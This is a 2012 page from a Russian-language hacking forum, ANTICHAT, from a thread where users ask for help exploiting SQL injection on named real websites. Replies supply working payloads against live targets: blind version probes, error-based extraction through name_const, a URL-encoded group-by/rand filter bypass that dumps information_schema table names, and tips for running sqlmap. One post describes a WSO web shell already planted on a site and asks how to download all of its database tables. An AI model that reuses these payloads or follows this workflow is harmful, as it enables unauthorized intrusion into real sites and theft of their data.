FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2006 из 2422

2006

Опции темы

Поиск в этой теме

Опции просмотра

16.04.2012, 02:49

asiaman

Guest

Сообщений: n/a

Провел на форуме:
10268

Репутация: 0

У меня вот это никак не крутится ни руками, ни софтом.

Там вообще есть что-нибудь?

Код:

Code:
http://develop.belta.by/{тут инъекция, видно через ОПЕРУ}

структура запроса

Код:

Code:
GET /1'"1000 HTTP/1.1 
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000 
x-forwarded-for: 1'"5000 
accept-language: 1'"6000 
via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed 
Host: develop.belta.by 
Connection: Keep-alive 
Accept-Encoding: gzip,deflate

Это ошибка вываливается в order by?

Код:

Code:
Ошибка при работе с базой данных.
Пожалуйста, обратитесь к администратору.
You have an error in your SQL syntax; check the manual that
 corresponds to your MySQL server version for the right syntax to 
use near ''''' at line 1

16.04.2012, 10:29

stan0009

Guest

Сообщений: n/a

Провел на форуме:
39063

Репутация: 0

Цитата:

Сообщение от None

Это ошибка вываливается в order by?

думаю это было утверждение, нежели вопрос)

софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять

с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение'

и суй куда нибудь типа того же sqlmap. может поможет

16.04.2012, 11:20

t3cHn0iD

Новичок

Регистрация: 06.04.2009

Сообщений: 2

Провел на форуме:
150479

Репутация: 2

Юзабельно ?

Код:

Code:
http://www.softclub.ru/games/game.asp?id=11984'

16.04.2012, 15:41

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

asiaman

Скуля там в URI.

http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)

http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE ()

Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).

Вывод версии в ошибке:

http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1

Duplicate column name '5.0.88-log'

t3cHn0iD

Нет.

16.04.2012, 16:00

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

Цитата:

Сообщение от None

http://www.l-craft.ru/catalog.php?c=38+order+by+1+--+

union+select +1+--+ не выводит ничего...

16.04.2012, 16:08

Unknown

Guest

Сообщений: n/a

Провел на форуме:
129743

Репутация: 92

Цитата:

Сообщение от shadowrun

shadowrun said:
union+select +1+--+ не выводит ничего...

blind

Код:

Code:
http://www.l-craft.ru/catalog.php?c=38+and+substring(@@version,1,1)=5

16.04.2012, 18:07

justonline

Guest

Сообщений: n/a

Провел на форуме:
179355

Репутация: 53

Код:

Code:
http://intersport.ru/company/countries'

фильтр select и union. как обойти?

16.04.2012, 19:57

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Цитата:

Сообщение от justonline

justonline said:

Код:

Code:
http://intersport.ru/company/countries'

фильтр select и union. как обойти?

URL encode:

http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67% 72%6F%75%70+by+concat(%20(%73%65%6C%65%63%74%20tab le_name+%66%72%6F%6D+information_schema.tables+lim it+17,1),floor(rand(0)*2))%20having%20min(0)--+

-> 1062Duplicate entry 'banners1' for key 1

16.04.2012, 20:53

Sanic1977

Новичок

Регистрация: 29.10.2008

Сообщений: 1

Провел на форуме:
1034

Репутация: 0

Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка:

SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line

1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1]

как раскрутить?

#10

16.04.2012, 21:01

skagen

Участник форума

Регистрация: 08.01.2010

Сообщений: 155

Провел на форуме:
1008872

Репутация: 22

Отправить сообщение для skagen с помощью ICQ

залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта

Страница 2006 из 2422

2006

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ